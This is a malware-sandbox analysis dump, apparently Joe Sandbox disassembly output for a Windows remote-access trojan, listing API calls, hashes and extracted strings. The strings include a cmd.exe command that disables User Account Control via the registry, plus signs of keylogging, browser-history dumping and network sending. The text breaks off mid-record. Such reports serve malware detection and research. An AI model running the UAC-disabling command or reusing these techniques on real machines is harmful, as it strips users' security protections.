                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                              • String ID:
                                              • API String ID: 493672254-0
                                              • Opcode ID: 465ab7c2e076ec59a8d270df8ce72ad0174e5281a4bfe7e39c5caa5367581a5e
                                              • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                              • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                              APIs
                                              • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                              • _free.LIBCMT ref: 004482CC
                                              • _free.LIBCMT ref: 004482F4
                                              • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                              • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                              • _abort.LIBCMT ref: 00448313
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                              • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                              • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: f94ae9c5674c9adfc346e263051d54d626d5e40d867c234dda8e9c50f9d09011
                                              • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                              • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 497ef82d1474d54709910eeaca97da118b40a23fe9dfeecc14ddd5be20b51566
                                              • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                              • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: cf41fc214d4f8651c842d323f4a9434d7ee1c2a315675ff23975f89e6a089888
                                              • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                              • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                              APIs
                                              • _strpbrk.LIBCMT ref: 0044E7B8
                                              • _free.LIBCMT ref: 0044E8D5
                                                • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                              • String ID: *?$.$v%(/
                                              • API String ID: 2812119850-1337875965
                                              • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                              • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                              • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000104), ref: 00443515
                                              • _free.LIBCMT ref: 004435E0
                                              • _free.LIBCMT ref: 004435EA
                                              • API ID: _free$FileModuleName
                                              • String ID: 8(Z$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
                                              • API String ID: 2506810119-253795733
                                              • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                              • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                              • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                              APIs
                                                • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                              • _wcslen.LIBCMT ref: 0041B7F4
                                              • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                              • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                              • API String ID: 3286818993-4246244872
                                              • Opcode ID: 21ce8c3951ea68e9f4768855c246d238a69c4de2a44f28aaa4944944c55ea733
                                              • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                              • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                              • API ID:
                                              • String ID: `#[
                                              • API String ID: 0-4119260463
                                              • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                              • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                              • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                              APIs
                                              • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                              • GetLastError.KERNEL32 ref: 0041D611
                                              • API ID: ClassCreateErrorLastRegisterWindow
                                              • String ID: 0$MsgWindowClass
                                              • API String ID: 2877667751-2410386613
                                              • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                              • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                              • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                              APIs
                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                              • CloseHandle.KERNEL32(?), ref: 004077E5
                                              • CloseHandle.KERNEL32(?), ref: 004077EA
                                              Strings
                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                              • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                              • API ID: CloseHandle$CreateProcess
                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                              • API String ID: 2922976086-4183131282
                                              • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                              • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                              • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              Strings
                                               Memory Dump Source
                                               • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                               Joe Sandbox IDA Plugin
                                               • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                              • String ID: KeepAlive | Disabled
                                              APIs
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                              • Sleep.KERNEL32(00002710), ref: 0041AE98
                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                              Similarity
                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                              • String ID: Alarm triggered
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                              Strings
                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                              Similarity
                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                              APIs
                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                              • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,0C[), ref: 0041C08B
                                                • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,0C[), ref: 0041C096
                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                              Similarity
                                              • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                              • String ID:
                                              APIs
                                                • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                              • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                              Similarity
                                              • API ID: CloseOpenQuerySleepValue
                                              • String ID: 0C[$8)[$exepath$xdF
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                              • _free.LIBCMT ref: 0044F43F
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                              • _free.LIBCMT ref: 00448353
                                              • _free.LIBCMT ref: 0044837A
                                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              APIs
                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                              • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                              Similarity
                                              • API ID: Process$CloseHandleOpen$FileImageName
                                              • String ID:
                                              APIs
                                              • _free.LIBCMT ref: 00450A54
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 00450A66
                                              • _free.LIBCMT ref: 00450A78
                                              • _free.LIBCMT ref: 00450A8A
                                              • _free.LIBCMT ref: 00450A9C
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              APIs
                                              • _free.LIBCMT ref: 00444106
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 00444118
                                              • _free.LIBCMT ref: 0044412B
                                              • _free.LIBCMT ref: 0044413C
                                              • _free.LIBCMT ref: 0044414D
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              Similarity
                                              • API ID:
                                              • String ID: v%(/
                                              APIs
                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFileKeyboardLayoutNameconnectsend
                                              • String ID: XQG$NG$PG
                                              • API String ID: 1634807452-3565412412
                                              • Opcode ID: b482f1db867d8d4eeecc1dc4e5804c467bd35124d5afc023a4359c15b2746b62
                                              • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                              • Opcode Fuzzy Hash: b482f1db867d8d4eeecc1dc4e5804c467bd35124d5afc023a4359c15b2746b62
                                              • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                              APIs
                                              • _free.LIBCMT ref: 00453009
                                                • Part of subcall function 00452DF9: __alloca_probe_16.LIBCMT ref: 00452E62
                                                • Part of subcall function 00452DF9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452EBF
                                                • Part of subcall function 00452DF9: __freea.LIBCMT ref: 00452EC8
                                              • _free.LIBCMT ref: 00452F5F
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00452F9A
                                                • Part of subcall function 00445B74: HeapAlloc.KERNEL32(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHeapLast_free$AllocByteCharFreeMultiWide__alloca_probe_16__freea
                                              • String ID: v%(/
                                              • API String ID: 1317440246-2435473048
                                              • Opcode ID: 6f7d6b8a41de1fbed53486ea7b03a8913d460fbbb43c153e705b8e5521843823
                                              • Instruction ID: b42996e4f32b2ce3557a5317cf724a2d3ce4ed36614ed27229f3ff0ed108fdae
                                              • Opcode Fuzzy Hash: 6f7d6b8a41de1fbed53486ea7b03a8913d460fbbb43c153e705b8e5521843823
                                              • Instruction Fuzzy Hash: 9441D571800225ABDF319F258C41FAB7BB8EF05756F00419BFD08E6296EA36CE44DB65
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,?,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0044BBFE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?), ref: 0044B980
                                              • GetLastError.KERNEL32(?,0044BBFE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B9B1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                              • String ID: v%(/
                                              • API String ID: 2456169464-2435473048
                                              • Opcode ID: 61a1eb95f210c0310294f4f1a604aaa858dc35aa92d75ae144fe4a4ae54a0673
                                              • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                              • Opcode Fuzzy Hash: 61a1eb95f210c0310294f4f1a604aaa858dc35aa92d75ae144fe4a4ae54a0673
                                              • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                              APIs
                                              • __alloca_probe_16.LIBCMT ref: 00452E62
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00452EBF
                                              • __freea.LIBCMT ref: 00452EC8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide__alloca_probe_16__freea
                                              • String ID: v%(/
                                              • API String ID: 3062693170-2435473048
                                              • Opcode ID: ff00a4c2f1050e14954907e5769f36e1cdeb28ccf5f2e28fac67180d14375554
                                              • Instruction ID: 547a5762545d9e1961a78ac081f297de34cc2a53ea43b9f31110d22f3e4d4f85
                                              • Opcode Fuzzy Hash: ff00a4c2f1050e14954907e5769f36e1cdeb28ccf5f2e28fac67180d14375554
                                              • Instruction Fuzzy Hash: 81312532A00156ABDB249FA5CD42CAF7BA4EB45715F08466AFC14EB282DB38CC44C794
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                              • String ID: /sort "Visit Time" /stext "$0NG
                                              • API String ID: 368326130-3219657780
                                              • Opcode ID: 19a75f4089cd682c196d93085774e8610958794b4b53e2c59ee42357a682b9a9
                                              • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
